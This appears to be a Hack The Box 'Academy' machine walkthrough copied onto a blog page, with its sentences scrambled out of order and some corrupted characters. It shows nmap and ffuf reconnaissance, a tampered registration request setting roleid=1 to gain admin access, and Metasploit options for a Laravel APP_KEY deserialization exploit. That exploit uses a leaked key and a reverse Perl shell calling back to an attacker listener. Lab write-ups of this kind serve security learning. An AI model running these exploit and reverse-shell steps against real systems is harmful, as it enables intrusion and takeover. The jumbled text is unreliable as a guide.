LHOST 10.10.14.6 yes The listen address (an interface may be specified )Ĭfx: ~/Documents/htb/academy/laravel-poc-CVE-2018-15133 |master ✓| Payload options (cmd/unix/reverse_perl ): SSL false no Negotiate SSL/TLS for outgoing connections RHOSTS 10.10.10.215 yes The target host (s ), range CIDR identifier, or hosts file with syntax 'file:' Proxies no A proxy chain of format type:host:port Name Current Setting Required DescriptionĪPP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0 = no The base64 encoded APP_KEY string from the. Module options (exploit/unix/http/laravel_token_unserialize_exec ): Msf5 exploit (unix/http/laravel_token_unserialize_exec ) > show options "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" Method 1 - MSF Luckily we do have this APP_KEY value leaked in the crash report: It turns there is deserialization vulnerability in HTTP X-XSRF-TOKEN header, Surprisingly to exploit this vulnerability we require Laravel APP_KEY Searching for Laravel RCE we come across certain articles and a Metasploit exploit. Looking at the error logs we understand it’s using Laravel framework. Seems like a TODO list, the last item gives us a new subdomain Laravel ExploitationĪdding the new subdomain to /etc/hosts and visiting presents us with a page full of debugging errors: User-Agent: Mozilla/5.0 (X11 Linux x86_64 rv:78.0 ) Gecko/20100101 Firefox/78.0Īccept: text/html,application/xhtml+xml,application/xml q =0.9,image/webp, */ * q =0.8Ĭontent-Type: application/x-Uid =cold&password =cfx&confirm =cfx&roleid =1īingo ! The new account allows us to Admin log in at, once logged in we see a banner Academy Launch Planner : Going back to the registration page and intercepting the request, we see some interesting parameters: :: Progress: :: Job :: 484 req/sec :: Duration: :: Errors: 0 ::Īll the pages seems familiar except admin.php, Visiting we get presented with a similar login page but the credentials we registered don’t work. → ffuf -c -r -u -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -e. Since we are unsure how this port can be helpful, we’ll leave it as it is. The MySQL X DevAPI Connector for Node.js only supports the X Protocol, which is implemented by the X Plugin (by default on port 33060). Port 3306 defaults to the classic MySQL Wire Protocol. Port 33060 - Node.js X DevAPI’s default port.Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel If you know the service/version, please submit the following fingerprint at : | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:ġ service unrecognized despite returning data. |_http-server-header: Apache/2.4.41 (Ubuntu ) Nmap scan report for academy.htb (10.10.10.215 )Ģ2/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux protocol 2.0 )
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |